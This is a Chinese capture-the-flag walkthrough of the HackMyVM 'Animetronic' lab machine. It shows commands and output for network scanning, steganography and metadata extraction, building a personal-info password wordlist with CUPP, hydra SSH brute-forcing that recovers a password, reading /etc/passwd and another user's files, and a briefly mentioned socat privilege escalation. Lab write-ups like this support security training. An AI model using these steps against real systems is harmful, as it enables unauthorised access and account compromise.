目录
信息收集
arp
nmap
nikto
whatweb
WEB
web信息收集
feroxbuster
steghide
exiftool
hydra
ssh连接
提权
系统信息收集
socat提权
信息收集
arp
┌──(root㉿0x00)-[~/HackMyVM]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:9d:6d:7b, IPv4: 192.168.9.183
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.189 08:00:27:43:25:2f PCS Systemtechnik GmbH
7 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.004 seconds (127.74 hosts/sec). 7 responded
nmap
端口信息收集
┌──(root㉿0x00)-[~/HackMyVM]
└─# nmap -p- 192.168.9.189 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-07 16:29 CST
Nmap scan report for 192.168.9.189
Host is up (0.22s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:43:25:2F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.48 seconds
版本服务信息收集
┌──(root㉿0x00)-[~/HackMyVM]
└─# nmap -sC -sV -O -p 22,80 192.168.9.189 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-07 16:30 CST
Nmap scan report for 192.168.9.189
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 59:eb:51:67:e5:6a:9e:c1:4c:4e:c5:da:cd:ab:4c:eb (ECDSA)
|_ 256 96:da:61:17:e2:23:ca:70:19:b5:3f:53:b5:5a:02:59 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Animetronic
|_http-server-header: Apache/2.4.52 (Ubuntu)
MAC Address: 08:00:27:43:25:2F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.52 seconds
nikto
┌──(root㉿0x00)-[~/HackMyVM]
└─# nikto -h http://192.168.9.189
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.9.189
+ Target Hostname: 192.168.9.189
+ Target Port: 80
+ Start Time: 2024-05-07 16:37:09 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.52 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 950, size: 60b24a4fb461c, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.52 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ 8103 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2024-05-07 16:37:28 (GMT8) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
whatweb
┌──(root㉿0x00)-[~/HackMyVM]
└─# whatweb -v http://192.168.9.189
WhatWeb report for http://192.168.9.189
Status : 200 OK
Title : Animetronic
IP : 192.168.9.189
Country : RESERVED, ZZ
Summary : Apache[2.4.52], Bootstrap, HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], JQuery, Script
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.52 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : https://getbootstrap.com/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.52 (Ubuntu) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
HTTP Headers:
HTTP/1.1 200 OK
Date: Tue, 07 May 2024 08:37:32 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 27 Nov 2023 16:17:54 GMT
ETag: "950-60b24a4fb461c-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1073
Connection: close
Content-Type: text/html
WEB
web信息收集
译:
很抱歉,这项服务现在不起作用,因为我们的主工厂发生了一场神秘的火灾。
译:
欢迎来到Animetronic
你需要忠诚的朋友吗?,你睡觉有问题吗?,你需要关心你的人吗?。所以你在合适的地方,我们公司为你提供机器人,他们的名字叫Animetronic。
它可以帮助你在日常生活中,从烹饪早餐到准备卧室。
注意信息收集:
用户名:Animetronic
当我们点击 Get Animetronic 这个按钮时候就出现发生火灾的提示!!
就算我们不点击,但是每次刷新网站都会触发这个事件!
那么目录扫描就成了一个问题!我们使用feroxbuster扫描器!
feroxbuster
一张图片,我们下载到本地分析!
steghide
┌──(root㉿0x00)-[~/HackMyVM]
└─# steghide info new_employees.jpg
"new_employees.jpg":
format: jpeg
capacity: 9.8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
需要密码!!!
exiftool
┌──(root㉿0x00)-[~/HackMyVM]
└─# exiftool new_employees.jpg
ExifTool Version Number : 12.65
File Name : new_employees.jpg
Directory : .
File Size : 160 kB
File Modification Date/Time : 2023:11:28 01:11:43+08:00
File Access Date/Time : 2024:05:07 16:50:50+08:00
File Inode Change Date/Time : 2024:05:07 16:50:38+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : page for you michael : ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=
Image Width : 703
Image Height : 1136
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 703x1136
Megapixels : 0.799
┌──(root㉿0x00)-[~/HackMyVM]
└─# echo "ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=" | base64 -d
ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝן
啥玩意??看着好像被倒过来了?
先反转再逆序即可得到文本!
message_for_michaeן
我尝试了作为密码去提取文件,但是错了,这个应该不是密码!
我尝试作为目录去访问,但是还是不行!
无论是在主站,还是在http://192.168.9.189/staffpages目录下,都不行!
我把 message_for_michaeן 改成了 message_for_michae1访问也不行!改成message_for_michaei访问也不行,改成 message_for_michael访问终于可以了!
译:
嗨,迈克尔
很抱歉我们之间发送信息的方式很复杂。
这是因为我指派了一个强大的黑客来尝试破解
我们的服务器。
顺便说一句,试着更改密码,因为这很容易
发现,因为这是您个人信息的混合
包含在此文件中
personal_info.txt
译:
姓名:迈克尔
年龄:27岁
出生日期:1996年10月19日
儿童人数:3名“ Ahmed-Yasser-Adam ”
爱好:游泳
得到用户信息:
Michael
Ahmed
Yasser
Adam
我们尝试爆破ssh密码!
hydra
在此之前,我们需要一个社工字典进行爆破!
┌──(root㉿0x00)-[~/tools/Information-Gathering_tools/CUPP/cupp]
└─# python3 cupp.py -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: Michael
> Surname:
> Nickname:
> Birthdate (DDMMYYYY): 19101996
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name: Ahmed
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]: y
> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed:
> Do you want to add special chars at the end of words? Y/[N]: y
> Do you want to add some random numbers at the end of words? Y/[N]:y
> Leet mode? (i.e. leet = 1337) Y/[N]:
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 3984 words.
> Hyperspeed Print? (Y/n) : n
[+] Now load your pistolero with michael.txt and shoot! Good luck!
┌──(root㉿0x00)-[~/tools/Information-Gathering_tools/CUPP/cupp]
└─# ls
CHANGELOG.md LICENSE README.md cupp-example.gif cupp-master.zip cupp.cfg cupp.py michael.txt test_cupp.py
把生成的字典作为密码字典跑hydra!
┌──(root㉿0x00)-[~/HackMyVM]
└─# hydra -l michael -P pass ssh://192.168.9.189
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-07 19:55:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.9.189:22/
[22][ssh] host: 192.168.9.189 login: michael password: leahcim1996
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-07 19:55:11
michael:leahcim1996
ssh连接
┌──(root㉿0x00)-[~/HackMyVM]
└─# ssh michael@192.168.9.189
The authenticity of host '192.168.9.189 (192.168.9.189)' can't be established.
ED25519 key fingerprint is SHA256:6amN4h/EjKiHufTd7GABl99uFy+fsL6YXJJRDyzxjGE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.9.189' (ED25519) to the list of known hosts.
michael@192.168.9.189's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Mon Nov 27 21:01:13 2023 from 10.0.2.6
michael@animetronic:~$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael)
michael@animetronic:~$
提权
系统信息收集
michael@animetronic:~$ cat /etc/passwd | grep "home" | grep -v nologin
henry:x:1000:1000:Hanry:/home/henry:/bin/bash
michael:x:1001:1001::/home/michael:/usr/bin/bash
michael@animetronic:/home/henry$ ls
Note.txt user.txt
michael@animetronic:/home/henry$ cat user.txt
0833990328464efff1de6cd93067cfb7
michael@animetronic:/home/henry$
michael@animetronic:/home/henry$ cat Note.txt
if you need my account to do anything on the server,
you will find my password in file named
aGVucnlwYXNzd29yZC50eHQK
┌──(root㉿0x00)-[~/HackMyVM]
└─# echo "aGVucnlwYXNzd29yZC50eHQK" | base64 -d
henrypassword.txt
我们需要找到此用户的密码!
密码为:IHateWilliam
socat提权
cat /root/root.txt
153a1b940365f46ebed28d74f142530f280a2c0a